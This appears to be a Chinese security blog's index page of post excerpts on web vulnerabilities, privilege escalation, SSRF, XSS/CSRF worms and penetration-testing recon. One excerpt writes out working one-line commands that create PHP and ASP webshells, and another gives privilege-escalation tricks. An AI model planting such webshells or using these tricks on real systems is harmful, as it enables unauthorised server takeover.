hkjs

分享最前沿的技术文章

hkjs

Discuz!X 前台任意文件删除漏洞复现测试

阅读(3536)评论(0)

Discuz!X 社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安 全稳定的社区论坛平台。  2017 年 9 月 29 日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导 致任意删除文件漏洞。  影响版本 DiscuzX &...

hkjs

【漏洞案例】储存XSS+CSRF(XSS绕过滤到蠕虫攻击)

阅读(2463)评论(0)

不知道更新什么了,给大家分享个漏洞案例吧,今天上午终于把电脑修好了,啊哈哈哈~ 某职业技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击) 注册处:http://xxx.edu.cn/meol/xxxx 需要注册才能进入社区发表嘛 先说下储存XSS,过滤了,发现可绕过 ...

hkjs

cmd生成webshell语句

阅读(2565)评论(0)

linux:echo -e "<?@include(\\$_POST["xc"]);?>" > xc.php 会在同目录下生成xc.php一句话 密码:xc win:  echo ^<%eval request("xc")%^> >>xc.asp ...

hkjs

SSRF漏洞的挖掘经验

阅读(2445)评论(0)

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他...

hkjs

一份信息安全笔试题

阅读(2499)评论(0)

1、sql注入有以下两个测试选项,选一个并且阐述不选另一个的理由:  A. demo.jsp?id=2+1 B. demo.jsp?id=2-1  选B,在 URL 编码中 + 代表空格,可能会造成混淆 2、以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路?&nbs...

hkjs

提权技巧

阅读(2646)评论(0)

1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是cmd.com cmd.txt cmd.rar 2.net user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径C:\RECYCLER\pr.exe,...

hkjs

逻辑漏洞之验证码功能缺陷

阅读(2582)评论(0)

1.介绍 验证码就是每次访问页面时随机生成的图片,内容一般是数字和字母(更BT点的有中文,现在已经升级到图片,动画等验证码),需要访问者把图中的数字字母填到表单中提交,这样就有效地防止了暴力破解。验证码也用于防止恶意灌水、广告帖等。在登陆的地方访问一个脚本文件,该文件生成含验证码的图片并将值写入到session里,提交的时候验证登陆的脚本就会判断提交的验证...

hkjs

漏洞挖掘经验分享

阅读(2390)评论(0)

我平时挖洞的经验,我总结了一下,大概有以下几点: 1、收集信息,尽可能的越多越好(主域名、IP段、搜索引擎、GitHub等)。 2、收集好信息后,对收集的信息进行一些扩展,增加信息收集的量(可以用SubDomain工具批量收集厂商域名信息,域名对应IP,数据多了之后,就可以拿来分析域名的真实地址、以及潜在的IP段)。 ...

hkjs

渗透测试中常见的端口

阅读(2181)评论(0)

在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口,也是笔者慢慢收集起来的,分享出来大家借鉴一下,也欢迎补充 1,web类(web漏洞/敏感目录) 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix  80 web  80-89 web  800...

hkjs

http协议的状态码

阅读(1975)评论(0)

1xx(临时响应) 表示临时响应并需要请求者继续执行操作的状态码。 100(继续) 请求者应当继续提出请求。服务器返回此代码表示已收到请求的第一部分,正在等待其余部分。 101(切换协议) 请求者已要求服务器切换协议,服务器已确认并准备切换。 ...



Powered by 小陈 © Boon theme By 小陈